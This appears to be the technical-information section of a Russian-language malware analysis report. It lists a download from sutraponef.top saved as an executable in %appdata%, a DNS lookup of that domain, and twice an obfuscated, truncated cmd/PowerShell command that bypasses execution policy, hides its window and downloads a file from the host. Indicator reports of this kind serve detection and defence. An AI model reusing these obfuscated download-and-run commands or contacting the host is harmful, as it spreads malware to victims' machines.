Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^wERshel^L.eX^E -e^xeCuTi^o^nPol^i^c^y B^Y^PaS^S -n^O^prO^FiLe^ ^-^WI^n^dowSTYLE HiDde^N (N^eW-OBJ^e^c^t^ ^SY^stE^m^.^net.webc^lIe^n^t).d^o^WN^LO^A^dfIlE('http://sutraponef.t...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "PO^wERshel^L.eX^E -e^xeCuTi^o^nPol^i^c^y B^Y^PaS^S -n^O^prO^FiLe^ ^-^WI^n^dowSTYLE HiDde^N (N^eW-OBJ^e^c^t^ ^SY^stE^m^.^net.webc^lIe^n^t).d^o^WN^LO^A^dfIlE('http://sutraponef.t...' (со скрытым окном)